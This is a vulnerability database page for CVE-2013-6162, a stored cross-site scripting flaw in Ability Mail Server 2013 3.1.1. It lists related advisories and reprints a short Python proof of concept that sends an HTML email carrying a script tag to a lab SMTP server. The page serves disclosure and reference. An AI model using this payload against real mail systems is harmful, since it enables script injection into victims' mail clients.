| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Ability Mail Server 2013 (3.1.1) - Stored XSS Vulnerability | 17 Dec 201300:00 | – | zdt | |
| CVE-2013-6162 | 17 Dec 201300:00 | – | circl | |
| CVE-2013-6162 | 21 Dec 201300:00 | – | cve | |
| CVE-2013-6162 | 21 Dec 201300:00 | – | cvelist | |
| EUVD-2013-5991 | 7 Oct 202500:30 | – | euvd | |
| Ability-Mail-Server-2013 | 4 Jan 201517:21 | – | exploitpack | |
| Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting | 17 Dec 201300:00 | – | exploitpack | |
| CVE-2013-6162 | 21 Dec 201300:55 | – | nvd | |
| Cross site scripting | 21 Dec 201300:55 | – | prion | |
| Ability Mail Server 2013 (3.1.1) 存储型跨站脚本漏洞 | 18 Dec 201300:00 | – | seebug |
#!/usr/bin/env python
'''
Exploit Title: Ability Mail Server 2013 Stored XSS
Date: 12/20/2013
Exploit Author: David Um
Vendor Homepage: http://www.code-crafters.com/
Software Link: http://download.code-crafters.com/ams.exe
Version: 3.1.1
Tested on: Windows Server 2003 SP2
CVE : CVE-2013-6162
Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.
'''
import smtplib
email_addr = '[email protected]'
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'
s = smtplib.SMTP('192.168.58.140', 25)
s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation